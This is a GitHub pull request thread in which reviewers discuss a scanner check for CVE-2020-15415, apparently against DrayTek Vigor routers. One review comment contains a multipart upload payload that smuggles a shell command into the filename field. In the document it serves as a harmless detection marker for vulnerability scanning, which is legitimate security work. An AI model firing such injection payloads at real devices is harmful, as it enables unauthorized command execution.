Feature/CVE 2020 15415
Ostorlab/agent_asteroid pull request #120
Opened 2024-10-03 14:26 UTC by PiranhaSa

2024-10-03 15:23 UTC, mohsinenar requested changes

2024-10-03 15:25 UTC, nmasdoufi-ol commented on agent/exploits/cve_2020_15415.py
> +            )
```suggestion
            )
            resp.raise_for_status()
```
Raise an error for bad responses

2024-10-03 15:26 UTC, nmasdoufi-ol commented on agent/exploits/cve_2020_15415.py
> +------WebKitFormBoundary--"""
```suggestion
        payload = f"""------WebKitFormBoundary
Content-Disposition: form-data; name="abc"; filename="t';echo {UNIQUE_VALUE};echo 'oxo_"
Content-Type: text/x-python-script

------WebKitFormBoundary--"""
```

2024-10-03 17:48 UTC, 3asm commented
@PiranhaSa the PR needs a more detailed description please.

2024-10-04 07:17 UTC, adnaneserrar approved these changes

2024-10-04 07:58 UTC, ErebusZ approved these changes

2024-10-04 08:38 UTC, PiranhaSa commented on agent/exploits/cve_2020_15415.py
> +------WebKitFormBoundary--"""
done

2024-10-04 09:13 UTC, deadly-panda commented on agent/exploits/cve_2020_15415.py
> +    accept_pattern = [re.compile(r"Vigor Login Page")]
Could be a const.. also the path from previous line..

2024-10-04 09:57 UTC, PiranhaSa commented on agent/exploits/cve_2020_15415.py
> +    accept_pattern = [re.compile(r"Vigor Login Page")]
For all the other PRs we use the path directly there

2024-10-04 14:57 UTC, 3asm approved these changes

2024-10-04 14:57 UTC, merged